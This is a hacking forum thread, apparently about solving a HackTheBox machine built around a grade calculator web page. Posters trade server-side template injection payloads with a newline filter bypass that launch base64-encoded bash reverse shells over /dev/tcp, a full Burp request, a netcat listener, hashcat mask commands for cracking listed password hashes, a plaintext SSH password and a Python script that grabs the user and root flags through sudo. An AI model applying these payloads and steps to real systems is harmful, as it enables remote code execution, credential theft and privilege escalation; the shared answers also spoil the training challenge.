Possibly Related Threads…

macsemose · Mar 03, 2024, 07:21 PM

grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41Ni8xMzM3IDA+JjEi+|+base64+-d+|+bash");%25>

not working

laranja · Mar 03, 2024, 08:14 PM

I already have the user.txt flag
and I also got hashes from several users but hascat I'm not able to break the hash or with john

1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

If anyone can help, I appreciate it Wink

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

laranja · Mar 03, 2024, 09:19 PM

(Mar 03, 2024, 08:34 PM)EnriQueHTB777 Wrote:
(Mar 03, 2024, 08:14 PM)laranja Wrote: I already have the user.txt flag
and I also got hashes from several users but hascat I'm not able to break the hash or with john

1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

If anyone can help, I appreciate it

Use hashcat mask mode to break hashes

hashcat -m 1400 <hash/hash file> -a 3 <mask pattern>

In the mail (/var/mail/susan) you will see the pattern that follows, and here you have a help to generate the pattern.

Built-in charsets ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?h = 0123456789abcdef ?H = 0123456789ABCDEF ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xff

Thank you, I already got root.txt
thank you all Wink

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

netwalker9000 · Mar 04, 2024, 02:42 AM

(Mar 03, 2024, 07:21 PM)macsemose Wrote: grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41Ni8xMzM3IDA+JjEi+|+base64+-d+|+bash");%25>

not working

Try changing the +'s in your base64 statement to %2b. Like this:

YmFzaCAtYyAiYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi41Ni8xMzM3IDA%2bJjEi

rootisbetter

(Mar 04, 2024, 05:39 AM)balckroot Wrote: Python Script That achieves user and root flag

import argparse import paramiko from colorama import init, Fore, Style init(autoreset=True) def ssh_connect(ip, command): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Perform SSH connection try: ssh.connect(ip, username='susan', password='susan_nasus_413759210') stdin, stdout, stderr = ssh.exec_command(command) output = stdout.read().decode().strip() return output except paramiko.AuthenticationException: return "Authentication failed." finally: ssh.close() def main(): parser = argparse.ArgumentParser(description='SSH into a target and execute commands.') parser.add_argument('-t', '--target-ip', dest='target_ip', required=True, help='The IP address of the target machine.') args = parser.parse_args() # SSH connection and command execution user_flag = ssh_connect(args.target_ip, 'cat /home/susan/user.txt') root_flag = ssh_connect(args.target_ip, 'echo "susan_nasus_413759210" | sudo -S cat /root/root.txt') # Print colored output print(f"{Fore.YELLOW} ~~balckroot~~") print(f"{Fore.GREEN}[User-Flag]"f"{Fore.BLUE}[{user_flag}]") print(f"{Fore.RED}[Root-Flag]"f"{Fore.BLUE}[{root_flag}]") if __name__ == '__main__': main()

Simple run

python flag.py -t <ip>

Output

~~balckroot~~ [User-Flag][<user-flag>] [Root-Flag][<root-flag>]

AHAHAHAHA YOU'R GOAT
But but can you give the command burpsuite ? because mine doesn't work, i'd like to know how you did it: precisely. Thks !!

grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=bash -c "bash -i >& /dev/tcp/10.10.14.45/1710 0>&1"
i enable intercept on ; modify the request like above ; forward ---> but doesnt work Sad

kiber · Mar 04, 2024, 07:11 AM

What should appear after submitting? Page just reloading and nothing new happens

calisamaa · Mar 04, 2024, 01:48 PM

ssh susan@10.10.11.253
susan_nasus_413759210

rootisbetter · Mar 04, 2024, 07:56 PM

(Mar 04, 2024, 07:11 AM)kiber Wrote: What should appear after submitting? Page just reloading and nothing new happens

after forwarding no just again on a calc page but nothing, can you share your command ?

dolare141 · Mar 05, 2024, 02:36 AM

(Mar 02, 2024, 08:47 PM)DoesntMatter123456 Wrote: Thanks for the payload.I am trying this by changing I.P and Port but still unable to get reverse shell. Any idea what can I be doing wrong

Check this out https://youtu.be/cQlb4C8WUG4

Try another payload or use `python3 <payload>`. make sure you urlencode the payload

K4dln · Mar 05, 2024, 04:25 AM

(Mar 02, 2024, 08:05 PM)jahman Wrote: You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. here is a payload:

category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+

Then you have to find the susan hash password in the /home/susan/Migration/pupilpath_credentials.db file

strings /home/susan/Migration/pupilpath_credentials.db

The format of the password is in the /var/spool/mail/susan. You can crack it with hashcazt in mask mode:

hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

Im listening (ip vpn h7b) nc -lvnp 4444
My Burp code
POST /weighted-grade-calc HTTP/1.1
Host: 10.129.217.20
Content-Length: 295
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.217.20
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.217.20/weighted-grade
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

grade1=12&weight1=12&category2=123&grade2=12&weight2=12&category3=khbj&grade3=12&weight3=12&category4=dfwdf&grade4=12&weight4=12&category5=sdfsd&grade5=12&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQ0NDQgMD4mMSI=+|+base64+-d+|+bash");%25>

But its dont work... WHYYYY???

Help me please

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	376	93,740	1 hour ago Last Post: Sukon
	[FREE] CPTS • CWES • CDSA • CWEE Exam Hint	3midjets	233	32,345	1 hour ago Last Post: Sukon
	[FREE] CPTS 12 FLAGS	pulsebreaker	74	2,368	1 hour ago Last Post: Sukon
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	89	8,101	6 hours ago Last Post: Xploitd
	[FREE] HackTheBox All Cheatsheets	Tamarisk	10	629	10 hours ago Last Post: chufoni